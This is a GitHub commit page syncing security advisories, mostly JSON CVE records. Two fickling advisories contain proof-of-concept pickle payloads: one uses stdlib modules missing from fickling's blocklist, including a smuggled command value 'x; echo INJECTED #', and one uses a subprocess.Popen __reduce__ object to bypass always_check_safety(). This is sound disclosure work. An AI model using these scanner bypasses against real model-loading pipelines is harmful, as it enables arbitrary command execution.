Skip to content

Commit 9900ec8

Browse files
Advisory Database Sync
1 parent e2837f2 commit 9900ec8

File tree

41 files changed

+1116
-25
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

41 files changed

+1116
-25
lines changed
Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5hwf-rc88-82xm",
4+
"modified": "2026-03-04T21:31:03Z",
5+
"published": "2026-03-04T21:31:03Z",
6+
"aliases": [],
7+
"summary": "Fickling missing RCE-capable modules in UNSAFE_IMPORTS",
8+
"details": "# Assessment\n\nThe modules `uuid`, `_osx_support` and `_aix_support` were added to the blocklist of unsafe imports (https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b).\n\n# Original report\n\n## Summary\n\nfickling's `UNSAFE_IMPORTS` blocklist is missing at least 3 stdlib modules that provide direct arbitrary command execution: `uuid`, `_osx_support`, and `_aix_support`. These modules contain functions that internally call `subprocess.Popen()` or `os.system()` with attacker-controlled arguments. A malicious pickle file importing these modules passes both `UnsafeImports` and `NonStandardImports` checks.\n\n\n## Affected Versions\n\n- fickling <= 0.1.8 (all versions)\n\n## Details\n\n### Missing Modules\n\nfickling's `UNSAFE_IMPORTS` (86 modules) does not include:\n\n| Module | RCE Function | Internal Mechanism | Importable On |\n|--------|-------------|-------------------|---------------|\n| `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)` | All platforms |\n| `_osx_support` | `_read_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |\n| `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` in `_read_output(\"/usr/bin/xcrun -find %s\" % toolname)` | All platforms |\n| `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |\n\n**Critical note:** Despite the names `_osx_support` and `_aix_support` suggesting platform-specific modules, they are importable on ALL platforms. Python includes them in the standard distribution regardless of OS.\n\n### Why These Pass fickling\n\n1. **`NonStandardImports`**: These are stdlib modules, so `is_std_module()` returns True → not flagged\n2. **`UnsafeImports`**: Module names not in `UNSAFE_IMPORTS` → not flagged\n3. **`OvertlyBadEvals`**: Function names added to `likely_safe_imports` (stdlib) → skipped\n4. **`UnusedVariables`**: Defeated by BUILD opcode (purposely unhardend)\n\n### Proof of Concept (using fickling's opcode API)\n\n```python\nfrom fickling.fickle import (\n Pickled, Proto, Frame, ShortBinUnicode, StackGlobal,\n TupleOne, TupleTwo, Reduce, EmptyDict, SetItem, Build, Stop,\n)\nfrom fickling.analysis import check_safety\nimport struct, pickle\n\nframe_data = b\"\\x95\" + struct.pack(\"<Q\", 60)\n\n# uuid._get_command_stdout — works on ALL platforms\nuuid_payload = Pickled([\n Proto(4),\n Frame(struct.pack(\"<Q\", 60), data=frame_data),\n ShortBinUnicode(\"uuid\"),\n ShortBinUnicode(\"_get_command_stdout\"),\n StackGlobal(),\n ShortBinUnicode(\"echo\"),\n ShortBinUnicode(\"PROOF_OF_CONCEPT\"),\n TupleTwo(),\n Reduce(),\n EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n Build(),\n Stop(),\n])\n\n# _aix_support._read_cmd_output — works on ALL platforms\naix_payload = Pickled([\n Proto(4),\n Frame(struct.pack(\"<Q\", 60), data=frame_data),\n ShortBinUnicode(\"_aix_support\"),\n ShortBinUnicode(\"_read_cmd_output\"),\n StackGlobal(),\n ShortBinUnicode(\"echo PROOF_OF_CONCEPT\"),\n TupleOne(),\n Reduce(),\n EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n Build(),\n Stop(),\n])\n\n# _osx_support._find_build_tool — command injection via %s\nosx_payload = Pickled([\n Proto(4),\n Frame(struct.pack(\"<Q\", 60), data=frame_data),\n ShortBinUnicode(\"_osx_support\"),\n ShortBinUnicode(\"_find_build_tool\"),\n StackGlobal(),\n ShortBinUnicode(\"x; echo INJECTED #\"),\n TupleOne(),\n Reduce(),\n EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n Build(),\n Stop(),\n])\n\n# All three: fickling reports LIKELY_SAFE\nfor name, p in [(\"uuid\", uuid_payload), (\"aix\", aix_payload), (\"osx\", osx_payload)]:\n result = check_safety(p)\n print(f\"{name}: severity={result.severity}, issues={len(result.results)}\")\n # Output: severity=Severity.LIKELY_SAFE, issues=0\n\n# All three: pickle.loads() executes the command\npickle.loads(uuid_payload.dumps()) # prints PROOF_OF_CONCEPT\n```\n\n### Verified Output\n\n```\n$ python3 poc.py\nuuid: severity=Severity.LIKELY_SAFE, issues=0\naix: severity=Severity.LIKELY_SAFE, issues=0\nosx: severity=Severity.LIKELY_SAFE, issues=0\nPROOF_OF_CONCEPT\n```\n\n## Impact\n\nAn attacker can craft a pickle file that executes arbitrary system commands while fickling reports it as `LIKELY_SAFE`. This affects any system relying on fickling for pickle safety validation, including ML model loading pipelines.\n\n## Suggested Fix\n\nAdd to `UNSAFE_IMPORTS` in fickling:\n```python\n\"uuid\",\n\"_osx_support\",\n\"_aix_support\",\n```\n\n**Longer term:** Consider an allowlist approach — only permit known-safe stdlib modules rather than blocking known-dangerous ones. The current 86-module blocklist still has gaps because the Python stdlib contains hundreds of modules.\n\n## Resources\n\n- Python source: `Lib/uuid.py` lines 156-168 (`_get_command_stdout`)\n- Python source: `Lib/_osx_support.py` lines 35-52 (`_read_output`), lines 54-68 (`_find_build_tool`)\n- Python source: `Lib/_aix_support.py` lines 14-30 (`_read_cmd_output`)\n- fickling source: `analysis.py` `UNSAFE_IMPORTS` set",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "fickling"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.1.9"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 0.1.8"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-5hwf-rc88-82xm"
43+
},
44+
{
45+
"type": "WEB",
46+
"url": "https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b"
47+
},
48+
{
49+
"type": "PACKAGE",
50+
"url": "https://github.com/trailofbits/fickling"
51+
}
52+
],
53+
"database_specific": {
54+
"cwe_ids": [
55+
"CWE-184"
56+
],
57+
"severity": "HIGH",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-03-04T21:31:03Z",
60+
"nvd_published_at": null
61+
}
62+
}

advisories/unreviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json renamed to advisories/github-reviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json

Lines changed: 32 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -1,40 +1,65 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-gj26-w59c-29mf",
4-
"modified": "2026-03-04T03:31:34Z",
4+
"modified": "2026-03-04T21:32:21Z",
55
"published": "2026-03-04T03:31:34Z",
66
"aliases": [
77
"CVE-2026-3452"
88
],
9-
"details": "Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of ZUSO ART https://zuso.ai/  for reporting.",
9+
"summary": "Concrete CMS vulnerable to Remote Code Execution by stored PHP object injection",
10+
"details": "Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. \n\nThe Concrete CMS security team thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of ZUSO ART https://zuso.ai/  for reporting.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V4",
13-
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
14+
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "concrete5/concrete5"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "9.4.8"
32+
}
33+
]
34+
}
35+
]
1436
}
1537
],
16-
"affected": [],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
2041
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3452"
2142
},
2243
{
2344
"type": "WEB",
24-
"url": "https://github.com/concretecms/concretecms/pull/12826/changes/167f16e4805d8ab546d2997c753ac21bf4854920:"
45+
"url": "https://github.com/concretecms/concretecms/pull/12826/changes/167f16e4805d8ab546d2997c753ac21bf4854920"
2546
},
2647
{
2748
"type": "WEB",
2849
"url": "https://documentation.concretecms.org/9-x/developers/introduction/version-history/948-release-notes"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/concretecms/concretecms"
2954
}
3055
],
3156
"database_specific": {
3257
"cwe_ids": [
3358
"CWE-502"
3459
],
3560
"severity": "HIGH",
36-
"github_reviewed": false,
37-
"github_reviewed_at": null,
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-03-04T21:32:21Z",
3863
"nvd_published_at": "2026-03-04T02:15:54Z"
3964
}
4065
}
Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wccx-j62j-r448",
4+
"modified": "2026-03-04T21:30:16Z",
5+
"published": "2026-03-04T21:30:16Z",
6+
"aliases": [],
7+
"summary": "Fickling has `always_check_safety()` bypass: pickle.loads and _pickle.loads remain unhooked",
8+
"details": "# Assessment\n\nThe missing pickle entrypoints `pickle.loads`, `_pickle.loads`, and `_pickle.load` were added to the hook https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7.\n\n# Original report\n\n## Summary\n`fickling.always_check_safety()` does not hook all pickle entry points. `pickle.loads`, `_pickle.loads`, and `_pickle.load` remain unprotected, enabling malicious payload execution despite global safety mode being enabled.\n\n## Affected versions\n`<= 0.1.8` (verified on current upstream HEAD as of 2026-03-03)\n\n## Non-duplication check against published Fickling GHSAs\nNo published advisory covers hook-coverage bypass in `run_hook()`.\nExisting advisories are blocklist/detection bypasses (runpy, pty, cProfile, marshal/types, builtins, network constructors, OBJ visibility, etc.), not runtime hook coverage parity.\n\n## Root cause\n`run_hook()` patches only:\n- `pickle.load`\n- `pickle.Unpickler`\n- `_pickle.Unpickler`\n\nIt does not patch:\n- `pickle.loads`\n- `_pickle.load`\n- `_pickle.loads`\n\n## Reproduction (clean upstream)\n```python\nimport io, pickle, _pickle\nfrom unittest.mock import patch\nimport fickling\nfrom fickling.exception import UnsafeFileError\n\nclass Payload:\n def __reduce__(self):\n import subprocess\n return (subprocess.Popen, (['echo','BYPASS'],))\n\ndata = pickle.dumps(Payload())\nfickling.always_check_safety()\n\n# Bypass path\nwith patch('subprocess.Popen') as popen_mock:\n pickle.loads(data)\n print('bypass sink called?', popen_mock.called) # True\n\n# Control path is blocked\nwith patch('subprocess.Popen') as popen_mock:\n try:\n pickle.load(io.BytesIO(data))\n except UnsafeFileError:\n pass\n print('blocked sink called?', popen_mock.called) # False\n```\n\nObserved on vulnerable code:\n- `pickle.loads` executes payload\n- `pickle.load` is blocked\n\n## Minimal patch diff\n```diff\n--- a/fickling/hook.py\n+++ b/fickling/hook.py\n@@\n def run_hook():\n- pickle.load = loader.load\n+ pickle.load = loader.load\n+ _pickle.load = loader.load\n+ pickle.loads = loader.loads\n+ _pickle.loads = loader.loads\n```\n\n## Validation after patch\n- `pickle.loads`, `_pickle.loads`, and `_pickle.load` all raise `UnsafeFileError`\n- sink not called in any path\n\nRegression tests added locally:\n- `test_run_hook_blocks_pickle_loads`\n- `test_run_hook_blocks__pickle_load_and_loads`\n in `test/test_security_regressions_20260303.py`\n\n## Impact\nHigh-confidence runtime protection bypass for applications that trust `always_check_safety()` as global guard.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "fickling"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.1.9"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 0.1.8"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-wccx-j62j-r448"
43+
},
44+
{
45+
"type": "WEB",
46+
"url": "https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7"
47+
},
48+
{
49+
"type": "PACKAGE",
50+
"url": "https://github.com/trailofbits/fickling"
51+
},
52+
{
53+
"type": "WEB",
54+
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.9"
55+
}
56+
],
57+
"database_specific": {
58+
"cwe_ids": [
59+
"CWE-693"
60+
],
61+
"severity": "HIGH",
62+
"github_reviewed": true,
63+
"github_reviewed_at": "2026-03-04T21:30:16Z",
64+
"nvd_published_at": null
65+
}
66+
}

advisories/unreviewed/2026/01/GHSA-gjxw-mrg7-952f/GHSA-gjxw-mrg7-952f.json

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -30,7 +30,8 @@
3030
],
3131
"database_specific": {
3232
"cwe_ids": [
33-
"CWE-120"
33+
"CWE-120",
34+
"CWE-401"
3435
],
3536
"severity": "MODERATE",
3637
"github_reviewed": false,

advisories/unreviewed/2026/02/GHSA-hh4j-fpgp-7x26/GHSA-hh4j-fpgp-7x26.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-hh4j-fpgp-7x26",
4-
"modified": "2026-02-10T21:31:31Z",
4+
"modified": "2026-03-04T21:32:40Z",
55
"published": "2026-02-10T21:31:31Z",
66
"aliases": [
77
"CVE-2026-1762"
@@ -19,6 +19,10 @@
1919
"type": "ADVISORY",
2020
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1762"
2121
},
22+
{
23+
"type": "WEB",
24+
"url": "https://www.gevernova.com/content/dam/cyber_security/global/en_US/pdfs/ges-2025-005.pdf"
25+
},
2226
{
2327
"type": "WEB",
2428
"url": "https://www.gevernova.com/grid-solutions/resources?prod=urfamily&type=21&node_id=4987&check_logged_in=1"

advisories/unreviewed/2026/02/GHSA-w49w-5662-qw44/GHSA-w49w-5662-qw44.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-w49w-5662-qw44",
4-
"modified": "2026-02-27T15:34:11Z",
4+
"modified": "2026-03-04T21:32:40Z",
55
"published": "2026-02-10T21:31:31Z",
66
"aliases": [
77
"CVE-2026-1763"
@@ -23,6 +23,10 @@
2323
"type": "WEB",
2424
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-048-03"
2525
},
26+
{
27+
"type": "WEB",
28+
"url": "https://www.gevernova.com/content/dam/cyber_security/global/en_US/pdfs/ges-2025-005.pdf"
29+
},
2630
{
2731
"type": "WEB",
2832
"url": "https://www.gevernova.com/grid-solutions/passport/login?destination=resources%3Fprod%3Durfamily%26type%3D21%26node_id%3D4987%26check_logged_in%3D1"
Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-27mg-gqcr-w5x5",
4+
"modified": "2026-03-04T21:32:46Z",
5+
"published": "2026-03-04T21:32:46Z",
6+
"aliases": [
7+
"CVE-2026-3544"
8+
],
9+
"details": "Heap buffer overflow in WebCodecs in Google Chrome prior to 145.0.7632.159 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)",
10+
"severity": [],
11+
"affected": [],
12+
"references": [
13+
{
14+
"type": "ADVISORY",
15+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3544"
16+
},
17+
{
18+
"type": "WEB",
19+
"url": "https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop.html"
20+
},
21+
{
22+
"type": "WEB",
23+
"url": "https://issues.chromium.org/issues/485683110"
24+
}
25+
],
26+
"database_specific": {
27+
"cwe_ids": [
28+
"CWE-122"
29+
],
30+
"severity": null,
31+
"github_reviewed": false,
32+
"github_reviewed_at": null,
33+
"nvd_published_at": "2026-03-04T20:16:21Z"
34+
}
35+
}
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2r28-vjg7-2q9r",
4+
"modified": "2026-03-04T21:32:46Z",
5+
"published": "2026-03-04T21:32:46Z",
6+
"aliases": [
7+
"CVE-2025-46108"
8+
],
9+
"details": "D-link Dir-513 A1FW110 is vulnerable to Buffer Overflow in the function formTcpipSetup.",
10+
"severity": [],
11+
"affected": [],
12+
"references": [
13+
{
14+
"type": "ADVISORY",
15+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46108"
16+
},
17+
{
18+
"type": "WEB",
19+
"url": "https://github.com/akuma-QAQ/CVEreport/tree/main/D-link/CVE-2025-46108"
20+
},
21+
{
22+
"type": "WEB",
23+
"url": "https://github.com/buobo/bo-s-CVE/blob/main/DIR-513/formTcpipSetup.md"
24+
},
25+
{
26+
"type": "WEB",
27+
"url": "https://www.dlink.com/en/security-bulletin"
28+
}
29+
],
30+
"database_specific": {
31+
"cwe_ids": [],
32+
"severity": null,
33+
"github_reviewed": false,
34+
"github_reviewed_at": null,
35+
"nvd_published_at": "2026-03-04T21:16:01Z"
36+
}
37+
}
Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-39w2-w255-frc6",
4+
"modified": "2026-03-04T21:32:46Z",
5+
"published": "2026-03-04T21:32:46Z",
6+
"aliases": [
7+
"CVE-2025-70225"
8+
],
9+
"details": "Stack buffer overflow vulnerability in D-Link DIR-513 v1.10 via the curtime parameter to the goform/formEasySetupWWConfig component",
10+
"severity": [],
11+
"affected": [],
12+
"references": [
13+
{
14+
"type": "ADVISORY",
15+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70225"
16+
},
17+
{
18+
"type": "WEB",
19+
"url": "https://github.com/akuma-QAQ/CVEreport/tree/main/D-link/CVE-2025-70225"
20+
},
21+
{
22+
"type": "WEB",
23+
"url": "https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-513"
24+
},
25+
{
26+
"type": "WEB",
27+
"url": "https://www.dlink.com/en/security-bulletin"
28+
}
29+
],
30+
"database_specific": {
31+
"cwe_ids": [],
32+
"severity": null,
33+
"github_reviewed": false,
34+
"github_reviewed_at": null,
35+
"nvd_published_at": "2026-03-04T21:16:02Z"
36+
}
37+
}

0 commit comments

Comments
 (0)